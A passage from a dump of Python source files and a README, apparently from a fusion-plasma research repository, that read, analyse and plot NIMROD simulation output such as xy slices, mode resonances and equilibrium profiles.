ax=fig.add_subplot(111)\n ax.set_aspect('equal')\n # levels = numpy.linspace(fmin, fmax, nlvls)\n levels = 50\n cf = ax.contourf(self.grid.rzp[0,:,:,0], self.grid.rzp[1,:,:,0], self.dbdtdict[key].data[1,:,:,0], levels)\n plt.colorbar(cf)\n plt.title(key)\n plt.tight_layout()\n plt.show()\n thisfft=self.fft(self.dbdtdict[key])\n print(self.dbdtdict[key].data.shape)\n print(thisfft.shape)\n print(thisfft[0,50,:,1])\n print(thisfft[0,50,:,-1])\n print(type(thisfft.real),type(self.dbdtdict[key].data))\n print(self.dbdtdict[key].data[0,50,:,0])\n\n print(np.nanmax(thisfft.real[0,50,:,0]))\n fig=plt.figure(figsize=(6,8))\n ax=fig.add_subplot(111)\n ax.set_aspect('equal')\n # levels = numpy.linspace(fmin, fmax, nlvls)\n levels = 50\n cf = ax.contourf(self.grid.rzp[0,:,:,0], self.grid.rzp[1,:,:,0], thisfft.real[0,:,:,1], levels)\n plt.colorbar(cf)\n plt.title(f\"fft {key}\")\n plt.tight_layout()\n plt.show()\n '''\n return None\n" }, { "alpha_fraction": 0.524592399597168, "alphanum_fraction": 0.5577507615089417, "avg_line_length": 34.48039245605469, "blob_id": "af2cedddd793add3760ed378383033de5ba4251a", "content_id": "f1976717e08867b33027a8e4760d4ec7fd378b8e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7238, "license_type": "no_license", "max_line_length": 113, "num_lines": 204, "path": "/surfmnNim2/xySliceClass.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n\nimport struct\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nclass xyClass:\n ''' Base clase for reading ax xy file'''\n def readxySlice(self):\n ''' Read xy_slice.bin '''\n npx=self.mx*self.pd+1\n npy=self.my*self.pd+1\n tf=np.zeros(47,dtype='f',order='F')\n self.ix=np.zeros([npx,npy],dtype='f',order='F')\n self.iy=np.zeros([npx,npy],dtype='f',order='F')\n 
self.R=np.zeros([npx,npy],dtype='f',order='F')\n self.Z=np.zeros([npx,npy],dtype='f',order='F')\n self.B0R=np.zeros([npx,npy],dtype='f',order='F')\n self.B0Z=np.zeros([npx,npy],dtype='f',order='F')\n self.B0T=np.zeros([npx,npy],dtype='f',order='F')\n self.J0R=np.zeros([npx,npy],dtype='f',order='F')\n self.J0Z=np.zeros([npx,npy],dtype='f',order='F')\n self.J0T=np.zeros([npx,npy],dtype='f',order='F') \n self.V0R=np.zeros([npx,npy],dtype='f',order='F')\n self.V0Z=np.zeros([npx,npy],dtype='f',order='F')\n self.V0T=np.zeros([npx,npy],dtype='f',order='F')\n self.P0=np.zeros([npx,npy],dtype='f',order='F')\n self.PE0=np.zeros([npx,npy],dtype='f',order='F')\n self.n0=np.zeros([npx,npy],dtype='f',order='F')\n self.diff=np.zeros([npx,npy],dtype='f',order='F')\n self.BRr=np.zeros([npx,npy],dtype='f',order='F')\n self.BZr=np.zeros([npx,npy],dtype='f',order='F')\n self.BTr=np.zeros([npx,npy],dtype='f',order='F')\n self.BRi=np.zeros([npx,npy],dtype='f',order='F')\n self.BZi=np.zeros([npx,npy],dtype='f',order='F')\n self.BTi=np.zeros([npx,npy],dtype='f',order='F')\n self.JRr=np.zeros([npx,npy],dtype='f',order='F')\n self.JZr=np.zeros([npx,npy],dtype='f',order='F')\n self.JTr=np.zeros([npx,npy],dtype='f',order='F')\n self.JRi=np.zeros([npx,npy],dtype='f',order='F')\n self.JZi=np.zeros([npx,npy],dtype='f',order='F')\n self.JTi=np.zeros([npx,npy],dtype='f',order='F')\n self.VRr=np.zeros([npx,npy],dtype='f',order='F')\n self.VZr=np.zeros([npx,npy],dtype='f',order='F')\n self.VTr=np.zeros([npx,npy],dtype='f',order='F')\n self.VRi=np.zeros([npx,npy],dtype='f',order='F')\n self.VZi=np.zeros([npx,npy],dtype='f',order='F')\n self.VTi=np.zeros([npx,npy],dtype='f',order='F')\n self.Pr=np.zeros([npx,npy],dtype='f',order='F')\n self.Pi=np.zeros([npx,npy],dtype='f',order='F')\n self.PEr=np.zeros([npx,npy],dtype='f',order='F')\n self.PEi=np.zeros([npx,npy],dtype='f',order='F')\n self.Nr=np.zeros([npx,npy],dtype='f',order='F')\n self.Ni=np.zeros([npx,npy],dtype='f',order='F')\n self.Cr=np.zeros([npx,npy],dtype='f',order='F')\n self.Ci=np.zeros([npx,npy],dtype='f',order='F')\n self.TEr=np.zeros([npx,npy],dtype='f',order='F')\n self.TEi=np.zeros([npx,npy],dtype='f',order='F')\n self.TIr=np.zeros([npx,npy],dtype='f',order='F')\n self.TIi=np.zeros([npx,npy],dtype='f',order='F')\n self.N=np.zeros([npx,npy],dtype='f',order='F')\n\n with open(self.file,'rb') as thisFile:\n jj=0\n thisFile.seek(0)\n\n while jj < npy:\n ii=0\n while ii < npx:\n thisLine=thisFile.read(4)\n blah=struct.unpack(\">l\",thisLine)\n thisLine=thisFile.read(188)\n tf = struct.unpack(\">\"+47*'f', thisLine)\n if jj==0 and (ii==0 or ii==1):\n tf1=tf\n thisLine=thisFile.read(4)\n blah=struct.unpack(\">l\",thisLine)\n self.ix[ii,jj]=tf[0]\n self.iy[ii,jj]=tf[1]\n self.R[ii,jj]=tf[2]\n self.Z[ii,jj]=tf[3]\n self.B0R[ii,jj]=tf[4]\n self.B0Z[ii,jj]=tf[5]\n self.B0T[ii,jj]=tf[6]\n self.J0R[ii,jj]=tf[7]\n self.J0Z[ii,jj]=tf[8]\n self.J0T[ii,jj]=tf[9]\n self.V0R[ii,jj]=tf[10]\n self.V0Z[ii,jj]=tf[11]\n self.V0T[ii,jj]=tf[12]\n self.P0[ii,jj]=tf[13]\n self.PE0[ii,jj]=tf[14]\n self.n0[ii,jj]=tf[15]\n self.diff[ii,jj]=tf[16]\n self.BRr[ii,jj]=tf[17]\n self.BZr[ii,jj]=tf[18]\n self.BTr[ii,jj]=tf[19]\n self.BRi[ii,jj]=tf[20]\n self.BZi[ii,jj]=tf[21]\n self.BTi[ii,jj]=tf[22]\n self.JRr[ii,jj]=tf[23]\n self.JZr[ii,jj]=tf[24]\n self.JTr[ii,jj]=tf[25]\n self.JRi[ii,jj]=tf[26]\n self.JZi[ii,jj]=tf[27]\n self.JTi[ii,jj]=tf[28]\n self.VRr[ii,jj]=tf[29]\n self.VZr[ii,jj]=tf[30]\n self.VTr[ii,jj]=tf[31]\n self.VRi[ii,jj]=tf[32]\n self.VZi[ii,jj]=tf[33]\n self.VTi[ii,jj]=tf[34]\n 
self.Pr[ii,jj]=tf[35]\n self.Pi[ii,jj]=tf[36]\n self.PEr[ii,jj]=tf[37]\n self.PEi[ii,jj]=tf[38]\n self.Nr[ii,jj]=tf[39]\n self.Ni[ii,jj]=tf[40]\n self.Cr[ii,jj]=tf[41]\n self.Ci[ii,jj]=tf[42]\n self.TEr[ii,jj]=tf[43]\n self.TEi[ii,jj]=tf[44]\n self.TIr[ii,jj]=tf[45]\n self.TIi[ii,jj]=tf[46]\n ii=ii+1\n if (jj<(npy-1)):\n thisLine= thisFile.read(8)\n jj=jj+1\n\n for i in range(len(self.BRr[:,0])-1):\n for j in self.slicesy:\n self.N[i,j]=-(self.R[i,j]/self.BZr[i,j])*(self.BZr[i+1,j]-self.BZr[i,j])/(self.R[i+1,j]-self.R[i,j])\n if self.BZr[i,j]==0:\n self.N[i,j]=0\n if (self.R[i+1,j]-self.R[i,j])==0:\n self.N[i,j]=0\n self.N[-1,j]=-(self.R[-1,j]/self.BZr[-1,j])*(self.BZr[-1,j]-self.BZr[-2,j])/(self.R[-1,j]-self.R[-2,j]) \n\n def plotxySlice(self):\n ''' Plot fields in xy_slice.bin. Currently only eq fields are plotted'''\n eqRows=3\n eqCols=4\n eqFigSize=(12,10)\n eqFig, eqAxs = plt.subplots(eqRows,eqCols,figsize=eqFigSize)\n eqAxs[0,0].contourf(self.R,self.Z,self.B0R)\n eqAxs[0,0].set_aspect('equal')\n eqAxs[0,0].set_title(r'$B_r$')\n\n eqAxs[0,1].contourf(self.R,self.Z,self.B0Z)\n eqAxs[0,1].set_aspect('equal')\n eqAxs[0,1].set_title(r'$B_z$')\n\n eqAxs[0,2].contourf(self.R,self.Z,self.B0T)\n eqAxs[0,2].set_aspect('equal')\n eqAxs[0,2].set_title(r'$RB_\\phi$')\n\n eqAxs[0,3].contourf(self.R,self.Z,self.P0)\n eqAxs[0,3].set_aspect('equal')\n eqAxs[0,3].set_title(r'$Pr$')\n\n eqAxs[1,0].contourf(self.R,self.Z,self.J0R)\n eqAxs[1,0].set_aspect('equal')\n eqAxs[1,0].set_title(r'$J_r$')\n\n eqAxs[1,1].contourf(self.R,self.Z,self.J0Z)\n eqAxs[1,1].set_aspect('equal')\n eqAxs[1,1].set_title(r'$J_z$')\n\n eqAxs[1,2].contourf(self.R,self.Z,self.J0T)\n eqAxs[1,2].set_aspect('equal')\n eqAxs[1,2].set_title(r'$J_\\phi/R$')\n\n eqAxs[1,3].contourf(self.R,self.Z,self.PE0)\n eqAxs[1,3].set_aspect('equal')\n eqAxs[1,3].set_title(r'$Pr_e$')\n\n eqAxs[2,0].contourf(self.R,self.Z,self.V0R)\n eqAxs[2,0].set_aspect('equal')\n eqAxs[2,0].set_title(r'$V_r$')\n\n eqAxs[2,1].contourf(self.R,self.Z,self.V0Z)\n eqAxs[2,1].set_aspect('equal')\n eqAxs[2,1].set_title(r'$V_z$')\n\n eqAxs[2,2].contourf(self.R,self.Z,self.V0T)\n eqAxs[2,2].set_aspect('equal')\n eqAxs[2,2].set_title(r'$V_\\phi$')\n\n eqAxs[2,3].contourf(self.R,self.Z,self.n0)\n eqAxs[2,3].set_aspect('equal')\n eqAxs[2,3].set_title(r'$nd$')\n\n plt.show()\n def __init__(self,xyFile,mx,my,pd,plot):\n self.file = xyFile\n self.mx = mx\n self.my = my\n self.pd = pd\n self.intSize=4\n self.floatSize=4\n self.slicesy=[0] #not sure what this does\n self.readxySlice()\n if plot:\n self.plotxySlice()\n" }, { "alpha_fraction": 0.5935919284820557, "alphanum_fraction": 0.5992130637168884, "avg_line_length": 32.566036224365234, "blob_id": "5867c574e06708c8c2d0f78bb074e9f3a135169f", "content_id": "c9b57f7c09db4e7debc139bd4a3c249ed4130b9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3558, "license_type": "no_license", "max_line_length": 79, "num_lines": 106, "path": "/mre_analysis/mre_runner.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\"\"\"Modified Rutherford Equation Runner\n\nThis script allows the user to perform a Modified Rutherford Equation\ntype analysis of the supplied NIMROD dump file or saved pickle file.\n\nThe script handles the IO file operations for a single time step. 
The\nactual analysis is performed in the module mre_step.py.\n\nThe input file is either a nimrod h5 dumpfile or are mre.pickle file.\nIf a dumpfile is supplied, then the correspond \"nimrod.in\" also needs\nto be present.\n\nIf the pickle command line argument is specified, then the calculated\ndata will be saved in a pickle for further reuse.\n\"\"\"\n\n\nimport os\nimport h5py\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\nimport pickle\nimport glob\nfrom shutil import copy2\nimport mre_step\nimport nim_timer as nimtime\nimport matplotlib.colors as mcolors\n\n\ndef mre_main(file_name=None, args={}):\n \"\"\" Gets the file and calls the MRE analysis if not pickled\n\n Parameters\n ----------\n file_name : str\n The file to be read. It can either be a nimrod dumpfile or \n a pickle file\n \n Returns\n ----------\n None\n \"\"\"\n\n if not os.path.isfile(file_name):\n print(f\"File {file_name} not found\")\n raise IOError\n dump_pre = [\"dumpgll\", \"dump\"]\n dump_suf = [\"h5\"]\n pickle_suf = [\"pickle\"]\n pickle_pre = [\"mre\"]\n nimrodin = \"nimrod.in\"\n pre = file_name.split('.')[0]\n if pre in dump_pre:\n print(f\"Performing hc analysis from dump file\")\n # check for nimrod.in and hdf5 format\n if not os.path.isfile(nimrodin):\n print(f\"nimrod.in not found\")\n raise IOError\n if not file_name.split('.')[-1] in dump_suf:\n print(f\"dump file is not hdf5 format\")\n raise IOError\n mre = mre_step.MreStep(file_name, nimrodin) \n mre.read_dumptime()\n mre.mre_analysis()\n #mre.calculate_power_fsa(nsurf=args['npts'],**args)\n nimtime.timer.print_times()\n time, step = mre.get_time()\n print(time, step)\n #pickle data here\n if args['pickle']:\n pfile = pickle_pre[0] + '.' + str(step).zfill(5) \\\n + '.' + pickle_suf[0]\n print(f\"Writing file {pfile}\")\n with open(pfile,'wb') as file:\n mre.dump(file)\n elif pre in pickle_pre:\n print(\"pickle_pre\")\n mre = mre_step.MreStep(None, None)\n mre.load(file_name)\n print(f\"Time: {mre.time}\" )\n else:\n print(f\"File {file_name} is not a recognized file type\")\n raise IOError\n #plot data here\n if args['plot']:\n mre.interpolate_fsa(radial='rhon', npts=200, fsa=False)\n mre.default_plot()\n return None\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description = 'MRE analysis')\n parser.add_argument('file', help = 'file name')\n parser.add_argument('--plot', action = 'store_true',\n help = 'shows plots')\n parser.add_argument('--pickle', action = 'store_true',\n help = 'pickle data')\n parser.add_argument('--npts', '-n', type = int, \n default = 100, help = 'number of surfaces')\n parser.add_argument('--dpow', '-d', type = float, default = 0.5,\n help = 'Controls radial distribtuion of surfaces')\n args = vars(parser.parse_args())\n print(args)\n mre_main(file_name = args['file'], args = args)#\\\n #pickle_data=args['pickle'],read_pickle=args['read'],args=args)\n" }, { "alpha_fraction": 0.6952104568481445, "alphanum_fraction": 0.6995645761489868, "avg_line_length": 26.600000381469727, "blob_id": "06b36ba87ed009bccb3b448bf93311e8ac0bc40b", "content_id": "52c70c58ccfd44c519fd0e010cc277ef8eb2f650", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 689, "license_type": "no_license", "max_line_length": 125, "num_lines": 25, "path": "/trip2Nim/README.md", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "# TripToNim\nA collection of scripts for processing trip3D external magnetic field data and converting it into a 
format that NIMROD reads.\n\n## Inputs:\n - trip3D probe_gb.out\n## Outputs:\n - nimrod brmpn##.dat\n\n## Key Steps:\n - Read Trip3D probe file files \n - Fourier Transform data from physical space to configuration space\n - Write NIMROD brmp files \n\n## Status: \n - Code runs but needs to be tested.\n\n## Todo:\n - [x] Test code\n - [x] Verify sign of B toroidal\n - [x] Verify sign of phi\n - [x] Verify that I'm using the correct mode number (n or -n)\n - [x] Verify FFT normalization (where do I divide by N)\n\n## Possible Future Work: \n - Use vector potential instead of B Field" }, { "alpha_fraction": 0.5895015597343445, "alphanum_fraction": 0.6294088363647461, "avg_line_length": 32.737430572509766, "blob_id": "6e9d0901b85de888a60806c768f30d122f71151f", "content_id": "7f5b016338d2e805c7bd5694082238963ae94d32", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6039, "license_type": "no_license", "max_line_length": 114, "num_lines": 179, "path": "/surfmn/surfmn_fsa_mult.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport os\nimport h5py\nimport surfmnstep\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\nimport pickle\nimport glob\nfrom shutil import copy2\n\nimport fsa_surfmn as surfmn\nimport matplotlib.colors as mcolors\n\n\n''' This is a generic script for analysing a multiple dumpfile/timestep\n using the surfmn fsa scripts '''\ndef pickle_sort(file):\n return int(file.split('.')[1])\n\ndef dump_sort(file):\n return int(file.split('.')[1])\n\ndef time_hist(steplist):\n print(len(steplist))\n time=np.zeros(len(steplist))\n psi21=np.zeros(len(steplist))\n psi31=np.zeros(len(steplist))\n psi41=np.zeros(len(steplist))\n psi32=np.zeros(len(steplist))\n psi43=np.zeros(len(steplist))\n psi54=np.zeros(len(steplist))\n psi65=np.zeros(len(steplist))\n times=[]\n mlist=[-1,-2,-3,-4]\n qlist=[-1,-2,-3,-4]\n\n for istep,step in enumerate(steplist):\n print(istep,step.step, step.time)\n time[istep]=step.time\n #if step.surfmn_data==False:\n # step.read_surfmn()\n psi21[istep]=step.get_resonance(\"psi\",1,-2)\n psi31[istep]=step.get_resonance(\"psi\",1,-3)\n psi41[istep]=step.get_resonance(\"psi\",1,-4)\n psi43[istep]=step.get_resonance(\"psi\",3,-4)\n psi32[istep]=step.get_resonance(\"psi\",2,-3)\n psi54[istep]=step.get_resonance(\"psi\",4,-5)\n psi65[istep]=step.get_resonance(\"psi\",5,-6)\n if step.step==00000:\n #print(step.mr.shape,step.q.shape)\n eq_q2 = step.get_rho_q(q=-2)\n eq_q3 = step.get_rho_q(q=-3)\n eq_q65 = step.get_rho_q(q=-1.2)\n eq_q54 = step.get_rho_q(q=-1.25)\n eq_q43 = step.get_rho_q(q=-4./3.)\n eq_q32 = step.get_rho_q(q=-3./2.)\n\n fig = plt.figure(figsize=(8,6))\n ax=fig.add_subplot(111)\n plt.plot(time*1000,psi21*1000,label=\"2/1\")\n plt.plot(time*1000,psi31*1000,label=\"3/1\")\n plt.plot(time*1000,psi32*1000,label=\"3/2\")\n plt.plot(time*1000,psi43*1000,label=\"4/3\")\n plt.plot(time*1000,psi54*1000,label=\"5/4\")\n plt.plot(time*1000,psi65*1000,label=\"6/5\")\n plt.plot(time*1000,psi41*1000,label=\"4/1\")\n ax.legend(loc='best',frameon=True,ncol=2,fontsize=14)\n plt.title(r\"$\\psi$\",fontsize=16)\n plt.ylabel(r'$\\psi$ [mWb] ',fontsize=16)\n plt.xlabel(r't [ms]',fontsize=16)\n plt.tight_layout()\n plt.show()\n\n\n\ndef surfmn_runner(show_plot=True,pickle_data=False,\\\n read_pickle=False,args=[]):\n ''' Perform surfmn analysie based on the the options\n If read pickle then it will look for pickle files else it will\n look for dump 
files\n '''\n\n dump_pre=[\"dumpgll\",\"dump\"]\n dump_suf=[\"h5\"]\n pickle_pre=[\"surfmn\"]\n pickle_suf=[\"pickle\"]\n nimrodin=\"nimrod.in\"\n steplist=[]\n read_new = True\n if read_pickle:\n pickle_list=glob.glob(\"surfmn*.pickle\")\n pickle_list.sort(key=pickle_sort)\n print(pickle_list)\n if len(pickle_list)<=0:\n print(\"No pickle files found\")\n raise IOError\n for iobj in pickle_list:\n with open(iobj,'rb') as file:\n surf=surfmn.fsasurfmn(None,None)\n surf.load(file)\n steplist.append(surf)\n # steplist.append(pickle.load(open(iobj, \"rb\" )))\n else: #read from dump files and calculate fsa\n dumplist=[]\n if args['folder']:\n workdir=os.getcwd()\n listobjs = os.listdir(workdir)\n listobjs.sort()\n for iobj in listobjs:\n if os.path.isdir(iobj):\n thisdir=workdir+'/'+iobj+'/dumpgll*.h5'\n dumpfiles=glob.glob(thisdir)\n for file in dumpfiles:\n dumplist.append(file)\n else:\n dumplist=glob.glob(\"dumpg*.h5\")\n dumplist.sort(key=dump_sort)\n if not os.path.isfile(nimrodin):\n print(f\"nimrod.in not found\")\n raise IOError\n\n rzo=np.array(args.get(\"rzo\",[1.768,-0.018831,0.0]))\n nsurf=args.get(\"nsurf\",150)\n fargs={}\n eqflag=args.get(\"eqflag\",1)\n mmax=args.get(\"mmax\",10)\n nmax=args.get(\"nmax\",5)\n nmodes=args.get('nmodes',-1)\n if nmodes <1 or nmodes>nmax :\n fargs['ifour']=list(range(1,nmax+1))\n else:\n start=nmax-nmodes+1\n fargs['ifour']=list(range(start,nmax+1))\n fargs['mmax']=mmax\n\n for file_name in dumplist:\n print(file_name)\n print(nimrodin)\n surf=surfmn.fsasurfmn(file_name,nimrodin)\n print(\"After init\")\n surf.get_dumptime()\n print(\"after dumptime\")\n surf.calculate(rzo=rzo,nsurf=nsurf,eqflag=eqflag,fargs=fargs)\n print(\"after calculate\")\n steplist.append(surf)\n if pickle_data:\n pfile=pickle_pre[0]+'.'+str(surf.step).zfill(5)+'.'+pickle_suf[0]\n print(f\"writing file {pfile}\")\n with open(pfile,'wb') as file:\n surf.dump(file)\n if show_plot:\n time_hist(steplist)\n plotlist=[54000]\n for step in steplist:\n if step.step in plotlist:\n step.plot()\n pass\n\n\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Surfmn runner.')\n parser.add_argument('--plot', action='store_true',help='shows plots')\n parser.add_argument('--folder', action='store_true',help='indicates the the dump files are stored in folders')\n parser.add_argument('--pickle', action='store_true',help='pickle data')\n parser.add_argument('--read', '-r', action='store_true',help='read pickled data')\n parser.add_argument('--mmax',type=int,default=15,help=\"max poloidal mode number\")\n parser.add_argument('--nmax',type=int,default=5, help=\"max toroidal mode number\")\n parser.add_argument('--nmodes', type=int, default=-1, \\\n help=\"number of toroidal modes, defualt goes from 1 to nmax\")\n parser.add_argument('--rzo',type=float, nargs=3, default=[1.768,-0.018831,0.0], help=\"intial guess for o-point\")\n parser.add_argument('--nsurf', type=int, default=150, help=\"number of surfaces\")\n parser.add_argument('--eqflag', type=int, default=1, help=\"flag to add n=0 perturbation to eq\")\n args = vars(parser.parse_args())\n print(args)\n surfmn_runner(show_plot=args['plot'],\\\n pickle_data=args['pickle'],read_pickle=args['read'],args=args)\n" }, { "alpha_fraction": 0.5572953820228577, "alphanum_fraction": 0.6070284843444824, "avg_line_length": 34.34591293334961, "blob_id": "cee67fe6720447ff8edfe4d6721d8936f9411c5f", "content_id": "56f69155fbcef0664db95b00c3d134918abfab5d", "detected_licenses": [], "is_generated": false, "is_vendor": false, 
"language": "Python", "length_bytes": 11240, "license_type": "no_license", "max_line_length": 148, "num_lines": 318, "path": "/surfmnNim/fgProfs.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport struct\nimport numpy as np\n#from mpl_toolkits.mplot3d import axes3d\nimport matplotlib.pyplot as plt\nfrom scipy import interpolate\n\n# counts based on the fact that the end of the file has two integer zeros (8) and each time adds numfields*4+8 (beginning and ending codes for data)\ndef count_time(filename,numfields):\n f=open(filename, 'rb')\n f.seek(0,2)\n fsize=f.tell()\n f.close\n return (fsize-8)/(numfields*4+8)\n\n\nlargef=16\nsmallf=8\ntitlef=18\ntickf=15\n\nplotprofs = 0\n# file size = 4* (49*(mx*pd+1)+2)*(my*pd+1)\n\n#plt.rcParams['text.usetex']=True\n\nint_size =4\nfloat_size = 4\n\n# list of file names to be read\nfiles=['/home/research/ehowell/SCRATCH/166439/03300_q104_flowtesting/orginal_exb/fgprofs.bin']\n\n# Create dictionaries for each file with pertinent information\n# Not necessary for files with time data as the \"1\" dimension\nnpx={}\nnpy={}\n\n# data in binary with number of fields in numfields\nnumfields=16\npsifac={}\nrho={}\nfrb={}\nmu0_p={}\nqg={}\nmach={}\nn_den={}\nmu0_pe={}\nomgeb={}\nKpol={}\nomgp={}\nhot_den={}\nhot_temp={}\nti={}\nte={}\nresidual={}\n\n#mu=(m**-1)\n\nfor findex in range(len(files)):\n fieldcount=count_time(files[findex],numfields)\n npx[files[findex]]=fieldcount\n\n psifac[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n rho[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n frb[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n mu0_p[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n qg[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n mach[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n n_den[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n mu0_pe[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n omgeb[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n Kpol[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n omgp[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n hot_den[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n hot_temp[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n ti[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n te[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n residual[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n\n f=open(files[findex], 'rb')\n\n jj=0\n f.seek(0)\n\n while jj < npx[files[findex]] :\n #first bite is length of a string\n temp=f.read(4)\n blah=struct.unpack(\">l\",temp)\n temp=f.read(numfields*4)\n tf = struct.unpack(\">\"+numfields*'f', temp)\n #last byte is length of string read\n temp=f.read(4)\n psifac[files[findex]][jj]=tf[0]\n rho[files[findex]][jj]=tf[1]\n frb[files[findex]][jj]=tf[2]\n mu0_p[files[findex]][jj]=tf[3]\n qg[files[findex]][jj]=tf[4]\n mach[files[findex]][jj]=tf[5]\n n_den[files[findex]][jj]=tf[6]\n mu0_pe[files[findex]][jj]=tf[7]\n omgeb[files[findex]][jj]=tf[8] \n Kpol[files[findex]][jj]=tf[9]\n omgp[files[findex]][jj]=tf[10]\n hot_den[files[findex]][jj]=tf[11]\n hot_temp[files[findex]][jj]=tf[12]\n ti[files[findex]][jj]=tf[13]\n te[files[findex]][jj]=tf[14]\n residual[files[findex]][jj]=tf[15]\n \n 
jj=jj+1\n\n f.close()\n\n#for i in range(len(qg[files[0]])):\n# qg[files[0]][i]=qg[files[0]][i]\n\nfor i in range(len(qg[files[0]])):\n mid2=(qg[files[0]][i]+2.)*(qg[files[0]][i+1]+2.)\n if mid2<0:\n irho2=i\n mid3=(qg[files[0]][i]+3.)*(qg[files[0]][i+1]+3.)\n if mid3<0:\n irho3=i\n mid4=(qg[files[0]][i]+4.)*(qg[files[0]][i+1]+4.)\n if mid4<0:\n irho4=i\n break\n\n\nif plotprofs == 1:\n fig1,ax1=plt.subplots(1,2,figsize=(16,5))\n #plt.subplots_adjust(left=0.10, bottom=0.12, right=0.95, top=0.92, wspace=0.175)\n\n plt.locator_params(axis='y',nbins=4)\n\n mup=[]\n for i in range(len(mu0_p[files[0]])):\n mup.append(100*mu0_p[files[0]][i])\n\n #ax1.set_title(r'$f$ v. $\\rho$',fontsize=titlef)\n plt.setp(ax1[0].get_xticklabels(), fontsize=20)\n plt.setp(ax1[0].get_yticklabels(), fontsize=20)\n ax1[0].plot(rho[files[0]][:],mup,'b',label=r'$100\\times\\mu_0p$',lw=3,color='b')\n ax1[0].plot(rho[files[0]][:],abs(qg[files[0]][:]),'b',label=r'$abs(q)$',lw=3,color='r')\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax1[0].axvline(x=rho[files[0]][irho2],lw=3,color='g',ls='dashed',label=r'$q=2$')\n ax1[0].axvline(x=rho[files[0]][irho3],lw=3,color='m',ls='dashed',label=r'$q=3$')\n ax1[0].axvline(x=rho[files[0]][irho4],lw=3,color='orange',ls='dashed',label=r'$q=4$')\n\n #ax2=ax1.twinx()\n #ax2.plot(rho[files[0]][:],omgeb[files[0]][:],'b',label=r'$\\Omega_{E\\times B}$',lw=3,color='g')\n #ax1.plot(0,0,'b',label=r'$\\Omega_{E\\times B}$ v. $\\rho$',lw=3,color='g')\n\n ax1[0].axhline(y=1,lw=2,ls='dotted',color='k')\n\n\n ax1[0].legend(fontsize=15,loc=2,ncol=2)\n\n #ax2.yaxis.major.formatter._useMathText = True\n #ax2.ticklabel_format(axis='y', style='sci', scilimits=(-2,-2))\n #ax1[0].yaxis.offsetText.set_fontsize(16)\n\n\n\n #ax.set_xlim(0.6,0.8)\n ax1[0].set_ylim(0,5.5)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n\n #plt.subplots_adjust(left=0.10, bottom=0.12, right=0.95, top=0.92, wspace=0.175)\n\n\n #ax1.set_title(r'$f$ v. $\\rho$',fontsize=titlef)\n plt.setp(ax1[1].get_xticklabels(), fontsize=20)\n plt.setp(ax1[1].get_yticklabels(), fontsize=20)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax1[1].axvline(x=rho[files[0]][irho2],lw=3,color='g',ls='dashed',label=r'$q=2$')\n ax1[1].axvline(x=rho[files[0]][irho3],lw=3,color='m',ls='dashed',label=r'$q=3$')\n ax1[1].axvline(x=rho[files[0]][irho4],lw=3,color='orange',ls='dashed',label=r'$q=4$')\n\n ax1[1].plot(rho[files[0]][:],omgeb[files[0]][:],'b',label=r'$\\Omega_{E\\times B}$',lw=5,color='b')\n\n\n ax1[1].axhline(y=0,lw=2,ls='dotted',color='k')\n\n ax1[1].yaxis.major.formatter._useMathText = True\n ax1[1].ticklabel_format(axis='y', style='sci', scilimits=(-2,-2))\n ax1[1].yaxis.offsetText.set_fontsize(18)\n ax1[1].tick_params(axis='y',labelsize=20)\n\n\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax1[0].set_xlabel(r'$\\rho$',fontsize=26)\n ax1[1].set_xlabel(r'$\\rho$',fontsize=26)\n ax1[1].set_ylabel(r'$\\Omega_{E\\times B}$',fontsize=26)\n\n #plt.savefig('fgprofs2.png',bbox_inches='tight')\n\n\n plt.show()\n\n\n fig1=plt.figure(figsize=(12,12))\n #plt.subplots_adjust(left=0.10, bottom=0.12, right=0.95, top=0.92, wspace=0.175)\n ax=fig1.add_subplot(331)\n plt.title(r'$f$ v. 
